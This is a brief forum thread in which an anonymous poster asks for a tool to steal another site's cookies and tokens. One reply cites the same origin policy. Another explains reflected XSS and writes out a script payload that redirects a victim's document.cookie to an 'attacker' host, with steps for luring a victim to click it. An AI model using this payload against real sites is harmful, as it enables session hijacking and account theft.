ePrivacy and GPDR Cookie Consent by Cookie Consent
Is there a website where it’s like an ip logger but instead it steals cookies for a certain website? – Digitalmunition




Home Forums Is there a website where it’s like an ip logger but instead it steals cookies for a certain website?

This topic contains 1 reply, has 2 voices, and was last updated by  Immortalem 1 month, 2 weeks ago.

  • Author
    Posts
  • #290002

    anonymous
    Participant

    This would be good for stealing tokens.

  • #290003

    Immortalem

    look up the same origin policy. You’ll realize that this isn’t possible in modern browsers.

  • #290004

    elonmusque

    Only if the website has an XSS vulnerability for example your victim sends a request with the cookie to the attackers webserver. One of the many ways looks like this:

    Attacker sets up a webserver, attackers tricks the victim to click a url with a script like

    ` http://www.website.com/<script>window.location = ‘http://attacker/?cookie=’+document.cookie </script> `

    This wil make the victim go to
    ` http://attacker/?cookie= (cookie from the previous website) `

    That wil trigger an HTTP request to the attacler’s server like ‘this pc has tried to request http://attacker/cookie=blablabla‘ where blablabla represents the cookie of the victim from that one website.

    This is a very simple example of XSS, read more here: https://excess-xss.com/

You must be logged in to reply to this topic.